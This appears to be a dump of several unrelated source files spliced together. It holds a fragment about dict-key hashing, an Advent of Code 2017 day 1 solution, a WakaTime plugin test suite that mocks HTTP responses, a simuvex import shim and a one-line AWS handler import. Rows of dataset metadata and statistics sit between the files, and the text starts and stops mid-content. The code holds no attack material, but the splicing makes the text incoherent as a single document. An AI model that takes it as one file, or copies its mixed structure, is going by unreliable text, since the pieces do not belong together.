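assert len({a: 1, b: 2}) == 1   # so they collapse to one dict key
```

The multiply-by-prime-then-XOR keeps the hash consistent with the field-wise `__eq__`, which is what makes these structs usable as dict keys and set members.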
# --- 1-inverse-captcha.py (lawrencefoley/advent-of-code-2017, MIT) ---
nums = "36743676522426214741687639282183216978128565594112364817283598621384839756628424146779311928318383597235968644687665159591573413233616717112157752469191845757712928347624726438516211153946892241449523148419426259291788938621886334734497823163281389389853675932246734153563861233894952657625868415432316155487242813798425779743561987563734944962846865263722712768674838244444385768568489842989878163655771847362656153372265945464128668412439248966939398765446171855144544285463517258749813731314365947372548811434646381595273172982466142248474238762554858654679415418693478512641864168398722199638775667744977941183772494538685398862344164521446115925528534491788728448668455349588972443295391385389551783289417349823383324748411689198219329996666752251815562522759374542652969147696419669914534586732436912798519697722586795746371697338416716842214313393228587413399534716394984183943123375517819622837972796431166264646432893478557659387795573234889141897313158457637142238315327877493994933514112645586351127139429281675912366669475931711974332271368287413985682374943195886455927839573986464555141679291998645936683639162588375974549467767623463935561847869527383395278248952314792112113126231246742753119748113828843917812547224498319849947517745625844819175973986843636628414965664466582172419197227695368492433353199233558872319529626825788288176275546566474824257336863977574347328469153319428883748696399544974133392589823343773897313173336568883385364166336362398636684459886283964242249228938383219255513996468586953519638111599935229115228837559242752925943653623682985576323929415445443378189472782454958232341986626791182861644112974418239286486722654442144851173538756859647218768134572858331849543266169672745221391659363674921469481143686952478771714585793322926824623482923579986434741714167134346384551362664177865452895348948953472328966995731169672573555621939584872187999325322327893336736611929752613241935211664248961527687778371971259654541239\
471766714469122213793348414477789271187324629397292446879752673"
total = 0  # avoid shadowing the builtin sum()
lastNum = int(nums[-1])  # the list is circular: the first digit's predecessor is the last digit
for num in nums:
    num = int(num)
    if num == lastNum:
        total += num
    lastNum = num
print(total)
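The loop above sums each digit that matches its circular neighbor. The same logic, generalized into a reusable sketch (the function name is mine), checked against the four worked examples from the puzzle statement:

```python
def inverse_captcha(digits):
    """Sum every digit that matches the next digit, treating the string as circular."""
    n = len(digits)
    return sum(int(d) for i, d in enumerate(digits) if d == digits[(i + 1) % n])

# Examples given in the Advent of Code 2017 day 1 statement:
assert inverse_captcha("1122") == 3
assert inverse_captcha("1111") == 4
assert inverse_captcha("1234") == 0
assert inverse_captcha("91212129") == 9
```

Comparing each digit to the next (mod n) and comparing each digit to the previous (mod n) produce the same total, since every matching pair contributes equal values either way.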
# --- vscode/extensions/WakaTime.vscode-wakatime-1.1.17/out/wakatime-master/tests/test_main.py (nlimpid/dotfiles, MIT) ---
# -*- coding: utf-8 -*-
from wakatime.main import execute
from wakatime.packages import requests

import logging
import os
import time
import shutil
import sys
import uuid

from testfixtures import log_capture
from wakatime.compat import u, is_py3
from wakatime.constants import (
    API_ERROR,
    AUTH_ERROR,
    MAX_FILE_SIZE_SUPPORTED,
    SUCCESS,
)
from wakatime.packages.requests.exceptions import RequestException
from wakatime.packages.requests.models import Response

from . import utils

try:
    from .packages import simplejson as json
except (ImportError, SyntaxError):
    import json

try:
    from mock import ANY
except ImportError:
    from unittest.mock import ANY

from wakatime.packages import tzlocal


class MainTestCase(utils.TestCase):
    patch_these = [
        'wakatime.packages.requests.adapters.HTTPAdapter.send',
        'wakatime.offlinequeue.Queue.push',
        ['wakatime.offlinequeue.Queue.pop', None],
        ['wakatime.offlinequeue.Queue.connect', None],
        'wakatime.session_cache.SessionCache.save',
        'wakatime.session_cache.SessionCache.delete',
        ['wakatime.session_cache.SessionCache.get', requests.session],
        ['wakatime.session_cache.SessionCache.connect', None],
    ]
    def test_500_response(self):
        response = Response()
        response.status_code = 500
        self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response

        with utils.TemporaryDirectory() as tempdir:
            entity = 'tests/samples/codefiles/twolinefile.txt'
            shutil.copy(entity, os.path.join(tempdir, 'twolinefile.txt'))
            entity = os.path.realpath(os.path.join(tempdir, 'twolinefile.txt'))

            now = u(int(time.time()))
            key = str(uuid.uuid4())
            args = ['--file', entity, '--key', key,
                    '--config', 'tests/samples/configs/paranoid.cfg', '--time', now]

            retval = execute(args)
            self.assertEquals(retval, API_ERROR)
            self.assertEquals(sys.stdout.getvalue(), '')
            self.assertEquals(sys.stderr.getvalue(), '')

            self.patched['wakatime.session_cache.SessionCache.delete'].assert_called_once_with()
            self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
            self.patched['wakatime.session_cache.SessionCache.save'].assert_not_called()

            heartbeat = {
                'language': 'Text only',
                'lines': 2,
                'entity': 'HIDDEN.txt',
                'project': os.path.basename(os.path.abspath('.')),
                'time': float(now),
                'type': 'file',
            }
            stats = {
                u('cursorpos'): None,
                u('dependencies'): [],
                u('language'): u('Text only'),
                u('lineno'): None,
                u('lines'): 2,
            }

            self.patched['wakatime.offlinequeue.Queue.push'].assert_called_once_with(ANY, ANY, None)
            for key, val in self.patched['wakatime.offlinequeue.Queue.push'].call_args[0][0].items():
                self.assertEquals(heartbeat[key], val)
            self.assertEquals(stats, json.loads(self.patched['wakatime.offlinequeue.Queue.push'].call_args[0][1]))
            self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()

            self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].assert_called_once_with(
                ANY, cert=None, proxies={}, stream=False, timeout=60, verify=True,
            )
    def test_400_response(self):
        response = Response()
        response.status_code = 400
        self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response

        with utils.TemporaryDirectory() as tempdir:
            entity = 'tests/samples/codefiles/twolinefile.txt'
            shutil.copy(entity, os.path.join(tempdir, 'twolinefile.txt'))
            entity = os.path.realpath(os.path.join(tempdir, 'twolinefile.txt'))

            now = u(int(time.time()))
            key = str(uuid.uuid4())
            args = ['--file', entity, '--key', key,
                    '--config', 'tests/samples/configs/paranoid.cfg', '--time', now]

            retval = execute(args)
            self.assertEquals(retval, API_ERROR)
            self.assertEquals(sys.stdout.getvalue(), '')
            self.assertEquals(sys.stderr.getvalue(), '')

            self.patched['wakatime.session_cache.SessionCache.delete'].assert_called_once_with()
            self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
            self.patched['wakatime.session_cache.SessionCache.save'].assert_not_called()
            self.patched['wakatime.offlinequeue.Queue.push'].assert_not_called()
            self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()

            self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].assert_called_once_with(
                ANY, cert=None, proxies={}, stream=False, timeout=60, verify=True,
            )
    def test_401_response(self):
        response = Response()
        response.status_code = 401
        self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response

        with utils.TemporaryDirectory() as tempdir:
            entity = 'tests/samples/codefiles/twolinefile.txt'
            shutil.copy(entity, os.path.join(tempdir, 'twolinefile.txt'))
            entity = os.path.realpath(os.path.join(tempdir, 'twolinefile.txt'))

            now = u(int(time.time()))
            key = str(uuid.uuid4())
            args = ['--file', entity, '--key', key,
                    '--config', 'tests/samples/configs/paranoid.cfg', '--time', now]

            retval = execute(args)
            self.assertEquals(retval, AUTH_ERROR)
            self.assertEquals(sys.stdout.getvalue(), '')
            self.assertEquals(sys.stderr.getvalue(), '')

            self.patched['wakatime.session_cache.SessionCache.delete'].assert_called_once_with()
            self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
            self.patched['wakatime.session_cache.SessionCache.save'].assert_not_called()

            heartbeat = {
                'language': 'Text only',
                'lines': 2,
                'entity': 'HIDDEN.txt',
                'project': os.path.basename(os.path.abspath('.')),
                'time': float(now),
                'type': 'file',
            }
            stats = {
                u('cursorpos'): None,
                u('dependencies'): [],
                u('language'): u('Text only'),
                u('lineno'): None,
                u('lines'): 2,
            }

            self.patched['wakatime.offlinequeue.Queue.push'].assert_called_once_with(ANY, ANY, None)
            for key, val in self.patched['wakatime.offlinequeue.Queue.push'].call_args[0][0].items():
                self.assertEquals(heartbeat[key], val)
            self.assertEquals(stats, json.loads(self.patched['wakatime.offlinequeue.Queue.push'].call_args[0][1]))
            self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()

            self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].assert_called_once_with(
                ANY, cert=None, proxies={}, stream=False, timeout=60, verify=True,
            )
    @log_capture()
    def test_500_response_without_offline_logging(self, logs):
        logging.disable(logging.NOTSET)

        response = Response()
        response.status_code = 500
        response._content = 'fake content'
        if is_py3:
            response._content = 'fake content'.encode('utf8')
        self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response

        with utils.TemporaryDirectory() as tempdir:
            entity = 'tests/samples/codefiles/twolinefile.txt'
            shutil.copy(entity, os.path.join(tempdir, 'twolinefile.txt'))
            entity = os.path.realpath(os.path.join(tempdir, 'twolinefile.txt'))

            now = u(int(time.time()))
            key = str(uuid.uuid4())
            args = ['--file', entity, '--key', key, '--disableoffline',
                    '--config', 'tests/samples/configs/good_config.cfg', '--time', now]

            retval = execute(args)
            self.assertEquals(retval, API_ERROR)
            self.assertEquals(sys.stdout.getvalue(), '')
            self.assertEquals(sys.stderr.getvalue(), '')

            log_output = u("\n").join([u(' ').join(x) for x in logs.actual()])
            expected = "WakaTime ERROR {'response_code': 500, 'response_content': u'fake content'}"
            if log_output[-2] == '0':
                expected = "WakaTime ERROR {'response_content': u'fake content', 'response_code': 500}"
            if is_py3:
                expected = "WakaTime ERROR {'response_code': 500, 'response_content': 'fake content'}"
                if log_output[-2] == '0':
                    expected = "WakaTime ERROR {'response_content': 'fake content', 'response_code': 500}"
            self.assertEquals(expected, log_output)

            self.patched['wakatime.session_cache.SessionCache.delete'].assert_called_once_with()
            self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
            self.patched['wakatime.session_cache.SessionCache.save'].assert_not_called()
            self.patched['wakatime.offlinequeue.Queue.push'].assert_not_called()
            self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()

            self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].assert_called_once_with(
                ANY, cert=None, proxies={}, stream=False, timeout=60, verify=True,
            )
    @log_capture()
    def test_requests_exception(self, logs):
        logging.disable(logging.NOTSET)

        self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].side_effect = RequestException('requests exception')

        with utils.TemporaryDirectory() as tempdir:
            entity = 'tests/samples/codefiles/twolinefile.txt'
            shutil.copy(entity, os.path.join(tempdir, 'twolinefile.txt'))
            entity = os.path.realpath(os.path.join(tempdir, 'twolinefile.txt'))

            now = u(int(time.time()))
            key = str(uuid.uuid4())
            args = ['--file', entity, '--key', key, '--verbose',
                    '--config', 'tests/samples/configs/good_config.cfg', '--time', now]

            retval = execute(args)
            self.assertEquals(retval, API_ERROR)
            self.assertEquals(sys.stdout.getvalue(), '')
            self.assertEquals(sys.stderr.getvalue(), '')

            log_output = u("\n").join([u(' ').join(x) for x in logs.actual()])
            expected = 'Parsing dependencies not supported for special.TextParser'
            self.assertIn(expected, log_output)
            expected = 'WakaTime DEBUG Sending heartbeat to api at https://api.wakatime.com/api/v1/heartbeats'
            self.assertIn(expected, log_output)
            expected = "RequestException': u'requests exception'"
            if is_py3:
                expected = "RequestException': 'requests exception'"
            self.assertIn(expected, log_output)

            self.patched['wakatime.session_cache.SessionCache.delete'].assert_called_once_with()
            self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
            self.patched['wakatime.session_cache.SessionCache.save'].assert_not_called()

            heartbeat = {
                'language': 'Text only',
                'lines': 2,
                'entity': entity,
                'project': os.path.basename(os.path.abspath('.')),
                'time': float(now),
                'type': 'file',
            }
            stats = {
                u('cursorpos'): None,
                u('dependencies'): [],
                u('language'): u('Text only'),
                u('lineno'): None,
                u('lines'): 2,
            }

            self.patched['wakatime.offlinequeue.Queue.push'].assert_called_once_with(ANY, ANY, None)
            for key, val in self.patched['wakatime.offlinequeue.Queue.push'].call_args[0][0].items():
                self.assertEquals(heartbeat[key], val)
            self.assertEquals(stats, json.loads(self.patched['wakatime.offlinequeue.Queue.push'].call_args[0][1]))
            self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()

            self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].assert_called_once_with(
                ANY, cert=None, proxies={}, stream=False, timeout=60, verify=True,
            )
    @log_capture()
    def test_requests_exception_without_offline_logging(self, logs):
        logging.disable(logging.NOTSET)

        self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].side_effect = RequestException('requests exception')

        with utils.TemporaryDirectory() as tempdir:
            entity = 'tests/samples/codefiles/twolinefile.txt'
            shutil.copy(entity, os.path.join(tempdir, 'twolinefile.txt'))
            entity = os.path.realpath(os.path.join(tempdir, 'twolinefile.txt'))

            now = u(int(time.time()))
            key = str(uuid.uuid4())
            args = ['--file', entity, '--key', key, '--disableoffline',
                    '--config', 'tests/samples/configs/good_config.cfg', '--time', now]

            retval = execute(args)
            self.assertEquals(retval, API_ERROR)
            self.assertEquals(sys.stdout.getvalue(), '')
            self.assertEquals(sys.stderr.getvalue(), '')

            log_output = u("\n").join([u(' ').join(x) for x in logs.actual()])
            expected = "WakaTime ERROR {'RequestException': u'requests exception'}"
            if is_py3:
                expected = "WakaTime ERROR {'RequestException': 'requests exception'}"
            self.assertEquals(expected, log_output)

            self.patched['wakatime.session_cache.SessionCache.delete'].assert_called_once_with()
            self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
            self.patched['wakatime.session_cache.SessionCache.save'].assert_not_called()
            self.patched['wakatime.offlinequeue.Queue.push'].assert_not_called()
            self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()

            self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].assert_called_once_with(
                ANY, cert=None, proxies={}, stream=False, timeout=60, verify=True,
            )
    @log_capture()
    def test_invalid_api_key(self, logs):
        logging.disable(logging.NOTSET)

        response = Response()
        response.status_code = 201
        self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response

        config = 'tests/samples/configs/missing_api_key.cfg'
        args = ['--config', config, '--key', 'invalid-api-key']

        with self.assertRaises(SystemExit) as e:
            execute(args)

        self.assertEquals(int(str(e.exception)), AUTH_ERROR)
        self.assertEquals(sys.stdout.getvalue(), '')
        expected = 'error: Invalid api key. Find your api key from wakatime.com/settings.'
        self.assertIn(expected, sys.stderr.getvalue())

        log_output = u("\n").join([u(' ').join(x) for x in logs.actual()])
        expected = ''
        self.assertEquals(log_output, expected)

        self.patched['wakatime.session_cache.SessionCache.get'].assert_not_called()
        self.patched['wakatime.session_cache.SessionCache.delete'].assert_not_called()
        self.patched['wakatime.session_cache.SessionCache.save'].assert_not_called()
        self.patched['wakatime.offlinequeue.Queue.push'].assert_not_called()
        self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()
        self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].assert_not_called()
    def test_nonascii_hostname(self):
        response = Response()
        response.status_code = 201
        self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response

        with utils.TemporaryDirectory() as tempdir:
            entity = 'tests/samples/codefiles/emptyfile.txt'
            shutil.copy(entity, os.path.join(tempdir, 'emptyfile.txt'))
            entity = os.path.realpath(os.path.join(tempdir, 'emptyfile.txt'))

            hostname = 'test汉语' if is_py3 else 'test\xe6\xb1\x89\xe8\xaf\xad'
            with utils.mock.patch('socket.gethostname') as mock_gethostname:
                mock_gethostname.return_value = hostname
                self.assertEquals(type(hostname).__name__, 'str')

                config = 'tests/samples/configs/good_config.cfg'
                args = ['--file', entity, '--config', config]
                retval = execute(args)
                self.assertEquals(retval, SUCCESS)
                self.assertEquals(sys.stdout.getvalue(), '')
                self.assertEquals(sys.stderr.getvalue(), '')

                self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
                self.patched['wakatime.session_cache.SessionCache.delete'].assert_not_called()
                self.patched['wakatime.session_cache.SessionCache.save'].assert_called_once_with(ANY)
                self.patched['wakatime.offlinequeue.Queue.push'].assert_not_called()
                self.patched['wakatime.offlinequeue.Queue.pop'].assert_called_once_with()

                headers = self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].call_args[0][0].headers
                self.assertEquals(headers.get('X-Machine-Name'), hostname.encode('utf-8') if is_py3 else hostname)
    def test_nonascii_timezone(self):
        response = Response()
        response.status_code = 201
        self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response

        with utils.TemporaryDirectory() as tempdir:
            entity = 'tests/samples/codefiles/emptyfile.txt'
            shutil.copy(entity, os.path.join(tempdir, 'emptyfile.txt'))
            entity = os.path.realpath(os.path.join(tempdir, 'emptyfile.txt'))

            class TZ(object):
                @property
                def zone(self):
                    return 'tz汉语' if is_py3 else 'tz\xe6\xb1\x89\xe8\xaf\xad'

            timezone = TZ()
            with utils.mock.patch('wakatime.packages.tzlocal.get_localzone') as mock_getlocalzone:
                mock_getlocalzone.return_value = timezone

                config = 'tests/samples/configs/has_everything.cfg'
                args = ['--file', entity, '--config', config, '--timeout', '15']
                retval = execute(args)
                self.assertEquals(retval, SUCCESS)

                self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
                self.patched['wakatime.session_cache.SessionCache.delete'].assert_not_called()
                self.patched['wakatime.session_cache.SessionCache.save'].assert_called_once_with(ANY)
                self.patched['wakatime.offlinequeue.Queue.push'].assert_not_called()
                self.patched['wakatime.offlinequeue.Queue.pop'].assert_called_once_with()

                headers = self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].call_args[0][0].headers
                self.assertEquals(headers.get('TimeZone'), u(timezone.zone).encode('utf-8') if is_py3 else timezone.zone)
    def test_timezone_with_invalid_encoding(self):
        response = Response()
        response.status_code = 201
        self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response

        with utils.TemporaryDirectory() as tempdir:
            entity = 'tests/samples/codefiles/emptyfile.txt'
            shutil.copy(entity, os.path.join(tempdir, 'emptyfile.txt'))
            entity = os.path.realpath(os.path.join(tempdir, 'emptyfile.txt'))

            class TZ(object):
                @property
                def zone(self):
                    return bytes('\xab', 'utf-16') if is_py3 else '\xab'

            timezone = TZ()
            with self.assertRaises(UnicodeDecodeError):
                timezone.zone.decode('utf8')

            with utils.mock.patch('wakatime.packages.tzlocal.get_localzone') as mock_getlocalzone:
                mock_getlocalzone.return_value = timezone

                config = 'tests/samples/configs/has_everything.cfg'
                args = ['--file', entity, '--config', config, '--timeout', '15']
                retval = execute(args)
                self.assertEquals(retval, SUCCESS)

                self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
                self.patched['wakatime.session_cache.SessionCache.delete'].assert_not_called()
                self.patched['wakatime.session_cache.SessionCache.save'].assert_called_once_with(ANY)
                self.patched['wakatime.offlinequeue.Queue.push'].assert_not_called()
                self.patched['wakatime.offlinequeue.Queue.pop'].assert_called_once_with()

                headers = self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].call_args[0][0].headers
                expected_tz = u(bytes('\xab', 'utf-16') if is_py3 else '\xab').encode('utf-8')
                self.assertEquals(headers.get('TimeZone'), expected_tz)
    def test_tzlocal_exception(self):
        response = Response()
        response.status_code = 201
        self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response

        with utils.TemporaryDirectory() as tempdir:
            entity = 'tests/samples/codefiles/emptyfile.txt'
            shutil.copy(entity, os.path.join(tempdir, 'emptyfile.txt'))
            entity = os.path.realpath(os.path.join(tempdir, 'emptyfile.txt'))

            with utils.mock.patch('wakatime.packages.tzlocal.get_localzone') as mock_getlocalzone:
                mock_getlocalzone.side_effect = Exception('tzlocal exception')

                config = 'tests/samples/configs/has_everything.cfg'
                args = ['--file', entity, '--config', config, '--timeout', '15']
                retval = execute(args)
                self.assertEquals(retval, SUCCESS)

                self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
                self.patched['wakatime.session_cache.SessionCache.delete'].assert_not_called()
                self.patched['wakatime.session_cache.SessionCache.save'].assert_called_once_with(ANY)
                self.patched['wakatime.offlinequeue.Queue.push'].assert_not_called()
                self.patched['wakatime.offlinequeue.Queue.pop'].assert_called_once_with()

                headers = self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].call_args[0][0].headers
                self.assertEquals(headers.get('TimeZone'), None)
    def test_timezone_header(self):
        response = Response()
        response.status_code = 201
        self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response

        with utils.TemporaryDirectory() as tempdir:
            entity = 'tests/samples/codefiles/emptyfile.txt'
            shutil.copy(entity, os.path.join(tempdir, 'emptyfile.txt'))
            entity = os.path.realpath(os.path.join(tempdir, 'emptyfile.txt'))

            config = 'tests/samples/configs/good_config.cfg'
            args = ['--file', entity, '--config', config]
            retval = execute(args)
            self.assertEquals(retval, SUCCESS)
            self.assertEquals(sys.stdout.getvalue(), '')
            self.assertEquals(sys.stderr.getvalue(), '')

            self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
            self.patched['wakatime.session_cache.SessionCache.delete'].assert_not_called()
            self.patched['wakatime.session_cache.SessionCache.save'].assert_called_once_with(ANY)
            self.patched['wakatime.offlinequeue.Queue.push'].assert_not_called()
            self.patched['wakatime.offlinequeue.Queue.pop'].assert_called_once_with()

            timezone = tzlocal.get_localzone()
            headers = self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].call_args[0][0].headers
            self.assertEquals(headers.get('TimeZone'), u(timezone.zone).encode('utf-8') if is_py3 else timezone.zone)
    @log_capture()
    def test_nonascii_filename(self, logs):
        logging.disable(logging.NOTSET)

        response = Response()
        response.status_code = 0
        self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response

        with utils.TemporaryDirectory() as tempdir:
            filename = list(filter(lambda x: x.endswith('.txt'), os.listdir(u('tests/samples/codefiles/unicode'))))[0]
            entity = os.path.join('tests/samples/codefiles/unicode', filename)
            shutil.copy(entity, os.path.join(tempdir, filename))
            entity = os.path.realpath(os.path.join(tempdir, filename))

            now = u(int(time.time()))
            config = 'tests/samples/configs/good_config.cfg'
            key = str(uuid.uuid4())
            args = ['--file', entity, '--key', key, '--config', config, '--time', now]

            retval = execute(args)
            self.assertEquals(retval, API_ERROR)
            self.assertEquals(sys.stdout.getvalue(), '')
            self.assertEquals(sys.stderr.getvalue(), '')

            log_output = u("\n").join([u(' ').join(x) for x in logs.actual()])
            self.assertEquals(log_output, '')

            self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
            self.patched['wakatime.session_cache.SessionCache.delete'].assert_called_once_with()
            self.patched['wakatime.session_cache.SessionCache.save'].assert_not_called()

            heartbeat = {
                'language': 'Text only',
                'lines': 0,
                'entity': os.path.realpath(entity),
                'project': os.path.basename(os.path.abspath('.')),
                'time': float(now),
                'type': 'file',
            }
            stats = {
                u('cursorpos'): None,
                u('dependencies'): [],
                u('language'): u('Text only'),
                u('lineno'): None,
                u('lines'): 0,
            }

            self.patched['wakatime.offlinequeue.Queue.push'].assert_called_once_with(ANY, ANY, None)
            for key, val in self.patched['wakatime.offlinequeue.Queue.push'].call_args[0][0].items():
                self.assertEquals(heartbeat[key], val)
            self.assertEquals(stats, json.loads(self.patched['wakatime.offlinequeue.Queue.push'].call_args[0][1]))
            self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()

            self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].assert_called_once_with(
                ANY, cert=None, proxies={}, stream=False, timeout=60, verify=True,
            )
    @log_capture()
    def test_unhandled_exception(self, logs):
        logging.disable(logging.NOTSET)

        with utils.mock.patch('wakatime.main.process_heartbeat') as mock_process_heartbeat:
            ex_msg = 'testing unhandled exception'
            mock_process_heartbeat.side_effect = RuntimeError(ex_msg)

            entity = 'tests/samples/codefiles/twolinefile.txt'
            config = 'tests/samples/configs/good_config.cfg'
            key = str(uuid.uuid4())
            args = ['--entity', entity, '--key', key, '--config', config]

            execute(args)

            self.assertIn(ex_msg, sys.stdout.getvalue())
            self.assertEquals(sys.stderr.getvalue(), '')

            log_output = u("\n").join([u(' ').join(x) for x in logs.actual()])
            self.assertIn(ex_msg, log_output)

            self.patched['wakatime.offlinequeue.Queue.push'].assert_not_called()
            self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()
            self.patched['wakatime.session_cache.SessionCache.get'].assert_not_called()
            self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].assert_not_called()
    def test_large_file_skips_lines_count(self):
        response = Response()
        response.status_code = 0
        self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response

        entity = 'tests/samples/codefiles/twolinefile.txt'
        config = 'tests/samples/configs/good_config.cfg'
        now = u(int(time.time()))
        args = ['--entity', entity, '--config', config, '--time', now]

        with utils.mock.patch('os.path.getsize') as mock_getsize:
            mock_getsize.return_value = MAX_FILE_SIZE_SUPPORTED + 1

            retval = execute(args)
            self.assertEquals(retval, API_ERROR)
            self.assertEquals(sys.stdout.getvalue(), '')
            self.assertEquals(sys.stderr.getvalue(), '')

            self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
            self.patched['wakatime.session_cache.SessionCache.delete'].assert_called_once_with()
            self.patched['wakatime.session_cache.SessionCache.save'].assert_not_called()

            heartbeat = {
                'language': 'Text only',
                'lines': None,
                'entity': os.path.realpath(entity),
                'project': os.path.basename(os.path.abspath('.')),
                'cursorpos': None,
                'lineno': None,
                'branch': 'master',
                'time': float(now),
                'type': 'file',
            }
            stats = {
                u('cursorpos'): None,
                u('dependencies'): [],
                u('language'): u('Text only'),
                u('lineno'): None,
                u('lines'): None,
            }

            self.patched['wakatime.offlinequeue.Queue.push'].assert_called_once_with(ANY, ANY, None)
            for key, val in self.patched['wakatime.offlinequeue.Queue.push'].call_args[0][0].items():
                self.assertEquals(heartbeat[key], val)
            self.assertEquals(stats, json.loads(self.patched['wakatime.offlinequeue.Queue.push'].call_args[0][1]))
            self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()

            self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].assert_called_once_with(
                ANY, cert=None, proxies={}, stream=False, timeout=60, verify=True,
            )
| 47.025994 | 129 | 0.622143 | 3,324 | 30,755 | 5.620638 | 0.0716 | 0.065942 | 0.1139 | 0.080501 | 0.875288 | 0.85816 | 0.848311 | 0.831558 | 0.819515 | 0.814377 | 0 | 0.00704 | 0.242562 | 30,755 | 653 | 130 | 47.098009 | 0.794977 | 0.000683 | 0 | 0.748077 | 0 | 0 | 0.271606 | 0.200508 | 0 | 0 | 0 | 0 | 0.282692 | 1 | 0.032692 | false | 0 | 0.040385 | 0.003846 | 0.084615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
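The test above relies on `mock.patch` with a `side_effect` exception to verify that an unhandled error inside a worker function is caught and surfaced by the caller. A minimal stdlib-only sketch of that pattern (the function and caller here are hypothetical stand-ins, not the real wakatime code):

```python
from unittest import mock

# Hypothetical stand-in for wakatime.main.process_heartbeat; calling it
# raises, simulating an unhandled exception inside the worker.
process_heartbeat = mock.Mock(side_effect=RuntimeError('testing unhandled exception'))

def execute(fn):
    # Mirrors the top-level pattern in the test: the caller catches the
    # unhandled exception and surfaces its message as text.
    try:
        fn()
        return ''
    except RuntimeError as ex:
        return 'error: {0}'.format(ex)

result = execute(process_heartbeat)
```

Assertions against `result` and `process_heartbeat.call_count` then play the role of `assertIn` and `assert_not_called` in the real test.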
06e2332b06a7786eda26f7cd9bcabd60c125b78e | 102 | py | Python | simuvex/simuvex/plugins/fast_memory.py | Ruide/angr-dev | 964dc80c758e25c698c2cbcc454ef5954c5fa0a0 | [
"BSD-2-Clause"
] | 86 | 2015-08-06T23:25:07.000Z | 2022-02-17T14:58:22.000Z | simuvex/simuvex/plugins/fast_memory.py | Ruide/angr-dev | 964dc80c758e25c698c2cbcc454ef5954c5fa0a0 | [
"BSD-2-Clause"
] | 132 | 2015-09-10T19:06:59.000Z | 2018-10-04T20:36:45.000Z | simuvex/simuvex/plugins/fast_memory.py | Ruide/angr-dev | 964dc80c758e25c698c2cbcc454ef5954c5fa0a0 | [
"BSD-2-Clause"
] | 80 | 2015-08-07T10:30:20.000Z | 2020-03-21T14:45:28.000Z | print('... Importing simuvex/plugins/fast_memory.py ...')
from angr.state_plugins.fast_memory import *
| 34 | 56 | 0.77451 | 14 | 102 | 5.428571 | 0.785714 | 0.289474 | 0.447368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088235 | 102 | 2 | 57 | 51 | 0.817204 | 0 | 0 | 0 | 0 | 0 | 0.470588 | 0.294118 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 1 | null | null | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 7 |
b08c84b220571776b1422516a7f07b8f9649e346 | 84 | py | Python | aws/main.py | whelmed/boston_serverless_meetup | 1cf405e6b28b38e68bb2844574d2e9fd62efb862 | [
"MIT"
] | null | null | null | aws/main.py | whelmed/boston_serverless_meetup | 1cf405e6b28b38e68bb2844574d2e9fd62efb862 | [
"MIT"
] | null | null | null | aws/main.py | whelmed/boston_serverless_meetup | 1cf405e6b28b38e68bb2844574d2e9fd62efb862 | [
"MIT"
] | null | null | null | from api.tweet.get import handler as get
